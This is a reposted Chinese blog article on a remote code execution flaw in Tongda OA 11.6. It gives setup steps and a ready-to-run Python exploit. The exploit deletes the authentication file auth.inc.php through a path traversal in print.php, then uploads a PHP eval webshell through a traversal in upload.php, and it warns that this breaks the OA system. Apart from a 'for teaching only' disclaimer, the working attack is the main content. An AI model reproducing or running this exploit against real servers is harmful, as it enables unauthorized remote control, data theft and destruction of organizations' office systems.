ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

通达OA最新RCE漏洞

2020-08-19 15:32:16  阅读:75  来源: 互联网

标签:url OA 通达 auth print RCE requests php inc


本片文章仅用于教学请不要用于非法用途

漏洞影响版本

TDOA11.6

 

漏洞环境

TDOA11.6

 

复现

本片EXP复现存在风险,使用后会造成OA系统无法使用

安装

安装包:https://cdndown.tongda2000.com/oa/2019/TDOA11.6.exe

一直下一步傻瓜式安装即可

用户名:admin 密码:空

 

 

 

 

登录后截图

 

 

 

 

 

EXP

import requests
target="url"  # 修改url参数
payload="<?php eval($_POST['3838']);?>"  # 一句话木马
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")


url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('dadada.php', payload)}
requests.post(url=url,files=files)
url=target+"/_dadada.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")
View Code

 

本片EXP复现存在风险,使用后会造成OA系统无法使用

 

python td.py

 

 

 

 

链接shell

 

 

 

标签:url,OA,通达,auth,print,RCE,requests,php,inc
来源: https://www.cnblogs.com/R-S-PY/p/13529620.html

专注分享技术,共同学习,共同进步。侵权联系[admin#icode9.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有